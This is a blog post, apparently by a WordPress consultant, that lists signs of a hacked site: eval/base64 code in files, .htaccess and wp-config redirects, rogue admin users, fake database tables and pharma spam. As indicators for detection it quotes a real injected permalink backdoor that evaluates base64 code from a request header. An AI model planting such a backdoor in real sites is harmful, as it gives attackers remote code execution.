I’ve been fixing an awful lot of hacked sites over the past few weeks, and many site owners do not know they have been hacked until someone tells them, do yourself a favour and check over these items below and make sure your site is okay.

Look Inside your WordPress code file

Fire up your favourite ftp  client and edit a few of the files in your site root. Look for weird-looking code statements like this.

eval(base64_decode(” A LOAD OF ENCRYPTED CODE GOES HERE “);

An even better method is to download all of your site and run a search on all of the files from your pc or mac.  This is the most common hack I am seeing.

UPDATE November 2012 

Feel free to read the whole post, but I recently starting working with a hack recovery specialist.

I’ve been working with Sucri.net on a number of hacked WordPress sites for my clients.  At $80 their hack recovery and security monitoring package is absolutely excellent, get them on the case for a fast hack recovery.

Sucri.net

Check Out Your Permalink

Another hack method I have seen is to append some code on the end of the permalink.

Goto settings -> permalink and ensure nothing has been tagged onto the end.  This is what I saw/

%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

A valid permalink is something link %postname%

.htaccess

A site had been hacked, and the .htaccess file was edited and a 301 redirection to a viagra site.  Have a look in your .htaccess file HINT the leading period/full stop marks the file as hidden you will have to make sure your ftp client shows hidden files.

A healthy .hatccess for word press should look like this.

The site was hacked and a redirection was put in by adding the following entries to the wp-config file

define('WP_SITEURL', 'malicious URL');

define('WP_HOME', 'malicious URL);

Spurious Redirections From Your Home Page

Check your home page, many blog owners rarely visit the home page of their site, make sure it is not re-directing to a malware site.

Weird Content

The high-profile hack of Chris Brogan’s site saw wierd ads appear on his site, check over your site to make sure there are no weird banner ads

Google Site View

Do a search for your site on Google by typing in:

site:mydomain.com

This will show how Google sees your site, certain hack attacks change your page titles to advertise  viagra and other recreational pharmaceuticals check out http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php

Google will also mark your site as “containing malware” if you have been hacked and you are hosting

Searches Leasing To YOur Site

Check out what searches are bringing people to your site, if you see viagra bringing people to your site as a keyword something is up.  If you use WordPress.com stats, that can give you a heads up.

Unusual Admin Users

Go to your authors and users section and look for weird admin level users.  Common ones I have seen are wordpress.org and system.

If you don’t recognise these users delete them.

Weird Database Tables

I’m not trying to make you paranoid, but you may want to inspect your tables too, I saw one hack attack which had created a rogue table full of malware.   The table was called wp_pagemeta, it looks like a proper table by masquerading as a cousin of the real table wp_postmeta.  Have a look at your tables can you account for them all?  Remember that plugins and themes can create their own tables too.

It’s Not Personal

Most hacked sites are just black hat SEO scam artists trying to increase their ranking, it’s not personal so don’t panic if you find you have been hacked.  Don’t take it personally, they are not out to getcha.  Give me a call if you find an issue.

It can be repaired.  Let me know in the comment if you would like some blog posts on cleaning up a hacked site.

Need More Help Fixing Your Hacked Site?

I’ve create a WordPress Hack Recovery Course

Photo credit Kapa Haka